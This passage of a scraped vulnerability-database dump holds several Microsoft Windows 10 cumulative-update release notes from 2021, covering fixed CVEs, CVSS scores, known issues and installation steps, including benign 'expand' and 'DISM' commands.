[CVE-2021-33757](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33757>). For more information, see KB5004605.\n * Addresses a vulnerability in which Primary Refresh Tokens are not strongly encrypted. This issue might allow the tokens to be reused until the token expires or is renewed. For more information about this issue, see [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>).\n * Security updates to Windows Apps, Windows Management, Windows Fundamentals, Windows Authentication, Windows User Account Control (UAC), Operating System Security, Windows Fundamentals, Windows Virtualization, Windows Linux, the Windows Kernel, the Microsoft Scripting Engine, the Windows HTML Platforms, the Windows MSHTML Platform, and Windows Graphics.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n## \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| \n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.\n 2. Select **Check for Updates** and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.\n**Note** If reinstalling the language pack does not mitigate the issue, reset your PC as follows:\n\n 1. Go to the **Settings **app > **Recovery**.\n 2. Select **Get Started** under the **Reset this PC** recovery option.\n 3. Select **Keep my Files**.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>) might fail to print when using smart card (PIV) authentication.| This issue is resolved in KB5005394. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5003711) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004244>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004244](<https://download.microsoft.com/download/6/a/9/6a91388b-a0d7-427c-914f-3f9139aac7e4/5004244.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004244 (OS Build 17763.2061)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-33779", "CVE-2021-34504"], "modified": "2021-07-13T07:00:00", "id": "KB5004244", "href": "https://support.microsoft.com/en-us/help/5004244", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:16:14", "description": "None\n**NEW 7/13/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>). \n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates to remove Adobe Flash from your device. \n * Updates for verifying usernames and passwords.\n * Updates to improve security when Windows performs basic operations.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Removes support for the PerformTicketSignature setting and permanently enables Enforcement mode for CVE-2020-17049. For more information and steps to enable full protection on domain controller servers, see [Managing deployment of Kerberos S4U changes for CVE-2020-17049](<https://support.microsoft.com/en-us/topic/kb4598347-managing-deployment-of-kerberos-s4u-changes-for-cve-2020-17049-569d60b7-3267-e2b0-7d9b-e46d770332ab>).\n * Addresses an issue that incorrectly renders some Enhanced Metafile Format (EMF) files. This issue occurs if you build the EMF files using third-party applications with **ExtCreatePen()** and **ExtCreateFontIndirect()**.\n * Addresses a redirector stop error that is caused by a race condition that occurs when the system deletes binding objects when connections close.\n * Removes the Adobe Flash component from your device.\n * Adds Advanced Encryption Standard (AES) encryption protections for [CVE-2021-33757](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33757>). For more information, see KB5004605.\n * Addresses a vulnerability in which Primary Refresh Tokens are not strongly encrypted. This issue might allow the tokens to be reused until the token expires or is renewed. For more information about this issue, see [CVE-2021-33779](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33779>).\n * Security updates to Windows Apps, Windows Fundamentals, Windows Authentication, Windows User Account Control (UAC), Operating System Security, the Windows Kernel, Windows Graphics, the Microsoft Scripting Engine, the Windows HTML Platforms, the Windows MSHTML Platform, and Windows Active Directory.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n## \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of [RFC 4556 spec](<https://www.ietf.org/rfc/rfc4556.txt>) might fail to print when using smart card (PIV) authentication.| This issue is resolved in KB5005393. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **> **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\n**Before installing this update**Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU (KB5001402) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004238>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004238](<https://download.microsoft.com/download/8/d/3/8d3920d3-40d4-43c8-a4f7-c8aacffabdca/5004238.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T07:00:00", "type": "mskb", "title": "July 13, 2021\u2014KB5004238 (OS Build 14393.4530)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17049", "CVE-2021-33757", "CVE-2021-33779", "CVE-2021-34459"], "modified": "2021-07-13T07:00:00", "id": "KB5004238", "href": "https://support.microsoft.com/en-us/help/5004238", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T16:08:18", "description": "None\n**NEW 4/13/21** \n**IMPORTANT **Windows 10, version 1909 will reach end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10.We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**NEW 4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In this April 13, 2021 release, we will install the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**2/16/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**12/8/20 \nREMINDER **Windows 10, version 1903 reached end of servicing on December 8, 2020. To continue receiving security and quality updates, Microsoft recommends that you update to the latest version of Windows 10. If you want to update to Windows 10, version 1909, you must use the Enablement Package KB4517245 (EKB). Using the EKB makes updating faster and easier and requires a single restart. For more information, see [Windows 10, version 1909 delivery options](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-version-1909-delivery-options/ba-p/1002660>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 18363.1108) released April 13, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an issue with security vulnerabilities identified by a security researcher. Because of these security vulnerabilities, this and all future Windows updates will no longer contain the [RemoteFX vGPU](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploy-graphics-devices-using-remotefx-vgpu>) feature. For more information about the vulnerability and its removal, see [CVE-2020-1036](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1036>) and [KB4570006](<https://support.microsoft.com/en-us/topic/update-to-disable-and-remove-the-remotefx-vgpu-component-in-windows-bbdf1531-7188-2bf4-0de6-641de79f09d2>). Secure vGPU alternatives are available using [Discrete Device Assignment (DDA)](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploying-graphics-devices-using-dda>) in Windows Server LTSC releases (Windows Server 2016 and Windows Server 2019) and Windows Server SAC releases (Windows Server, version 1803 and later versions).\n * Addresses a potential elevation of privilege vulnerability in the way Azure Active Directory web sign-in allows arbitrary browsing from the third-party endpoints used for federated authentication. For more information, see [CVE-2021-27092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27092>) and [Policy CSP - Authentication](<https://docs.microsoft.com/en-us/windows/client-management/mdm/policy-csp-authentication#authentication-enablewebsignin>).\n * Addresses an issue that causes Windows Back up using File History to stop working for a few users. This issue occurs after installing the February 9, 2021 update. The error message is, \u201cFailed to start the backup of user links (error 8007005)\u201d.\n * Security updates to Windows App Platform and Frameworks, Windows Apps, Windows Input and Composition, Windows Office Media, Windows Fundamentals, Windows Cryptography, the Windows AI Platform, Windows Hybrid Cloud Networking, the Windows Kernel, Windows Virtualization, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nScroll bar controls might appear blank on the screen and not function after installing this update. This issue affects 32-bit applications running on 64-bit Windows 10 (WOW64) that create scroll bars using a [superclass](<https://docs.microsoft.com/en-us/windows/win32/winmsg/about-window-procedures#window-procedure-superclassing>) of the **USER32.DLL SCROLLBAR** window class. This issue also affects **HScrollBar** and **VScrollBar** controls that are used in Visual Basic 6 applications and the classes derived from **[System.Windows.Forms.ScrollBar](<https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.scrollbar?view=net-5.0>)** that are used in .NET Windows Forms applications. A memory usage increase of up to 4 GB might occur in 64-bit applications when you create a scroll bar control.Scroll bars you create using the **SCROLLBAR** window class or using the WS_HSCROLL and WS_VSCROLL window styles function normally. Applications that use the scroll bar control that is implemented in **COMCTL32.DLL** version 6 are not affected. This includes .NET Windows Forms applications that call **Application.EnableVisualStyles()**.| This issue is resolved in KB5003169. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the April 13, 2021 servicing stack update (SSU) (KB5001406) or later before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001337>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5001337](<https://download.microsoft.com/download/e/1/0/e10a6884-2e7a-4d80-ac2f-884c39a2a1b2/5001337.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mskb", "title": "April 13, 2021\u2014KB5001337 (OS Build 18363.1500)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1036", "CVE-2020-17049", "CVE-2021-27092", "CVE-2021-28434"], "modified": "2021-04-13T07:00:00", "id": "KB5001337", "href": "https://support.microsoft.com/en-us/help/5001337", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T14:08:20", "description": "None\n**NEW 4/13/21 \nREMINDER **Microsoft removed the Microsoft Edge Legacy desktop application that is out of support in March 2021. In this April 13, 2021 release, we will install the new Microsoft Edge. For more information, see [New Microsoft Edge to replace Microsoft Edge Legacy with April\u2019s Windows 10 Update Tuesday release](<https://aka.ms/EdgeLegacyEOS>).\n\n**2/24/21** \n**IMPORTANT **As part of the end of support for Adobe Flash, KB4577586 is now available as an optional update from Windows Update (WU) and Windows Server Update Services (WSUS). Installing KB4577586 will remove Adobe Flash Player permanently from your Windows device. Once installed, you cannot uninstall KB4577586. For more details about Microsoft\u2019s plans, see [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>).**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates to improve security when Windows performs basic operations.\n * Updates to improve security when using input devices such as a mouse, keyboard, or pen.\n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n## \n\n__\n\nWindows 10 servicing stack update - 19041.925 and 19042.925 \n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n## \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1144) released April 13, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue in which a principal in a trusted MIT realm fails to obtain a Kerberos service ticket from Active Directory domain controllers (DC). This occurs on devices that installed Windows Updates that contain CVE-2020-17049 protections and configured PerfromTicketSignature to 1 or higher. These updates were released between November 10, 2020 and December 8, 2020. Ticket acquisition also fails with the error, \u201cKRB_GENERIC_ERROR\u201d, if callers submit a PAC-less Ticket Granting Ticket (TGT) as an evidence ticket without providing the USER_NO_AUTH_DATA_REQUIRED flag.\n * Addresses an issue with security vulnerabilities identified by a security researcher. Because of these security vulnerabilities, this and all future Windows updates will no longer contain the [RemoteFX vGPU](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploy-graphics-devices-using-remotefx-vgpu>) feature. For more information about the vulnerability and its removal, see [CVE-2020-1036](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1036>) and [KB4570006](<https://support.microsoft.com/en-us/topic/update-to-disable-and-remove-the-remotefx-vgpu-component-in-windows-bbdf1531-7188-2bf4-0de6-641de79f09d2>). Secure vGPU alternatives are available using [Discrete Device Assignment (DDA)](<https://docs.microsoft.com/en-us/windows-server/virtualization/hyper-v/deploy/deploying-graphics-devices-using-dda>) in Windows Server LTSC releases (Windows Server 2016 and Windows Server 2019) and Windows Server SAC releases (Windows Server, version 1803 and later versions).\n * Addresses a potential elevation of privilege vulnerability in the way Azure Active Directory web sign-in allows arbitrary browsing from the third-party endpoints used for federated authentication. For more information, see [CVE-2021-27092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27092>) and [Policy CSP - Authentication](<https://docs.microsoft.com/en-us/windows/client-management/mdm/policy-csp-authentication#authentication-enablewebsignin>).\n * Addresses an issue that causes Windows Back up using File History to stop working for a few users. This issue occurs after installing the February 9, 2021 update. The error message is, \u201cFailed to start the backup of user links (error 8007005)\u201d.\n * Security updates to Windows App Platform and Frameworks, Windows Apps, Windows Input and Composition, Windows Office Media, Windows Fundamentals, Windows Cryptography, the Windows AI Platform, Windows Kernel, Windows Virtualization, and Windows Media.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nA small subset of users have reported lower than expected performance in games after installing this update. Most users affected by this issue are running games full screen or borderless windowed modes and using two or more monitors.| This issue is resolved in KB5003690. \nAfter installing this update, 5.1 Dolby Digital audio may play containing a high-pitched noise or squeak in certain apps when using certain audio devices and Windows settings.**Note **This issue does not occur when stereo is used.| This issue is resolved in KB5003690. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). If you encounter the error, 0x800f0823 \u2013 CBS_E_NEW_SERVICING_STACK_REQUIRED, close the error message and install the last standalone SSU (KB4598481) **before** installing this LCU. You will not need to install this SSU (KB4598481) again for future updates. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5001330>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 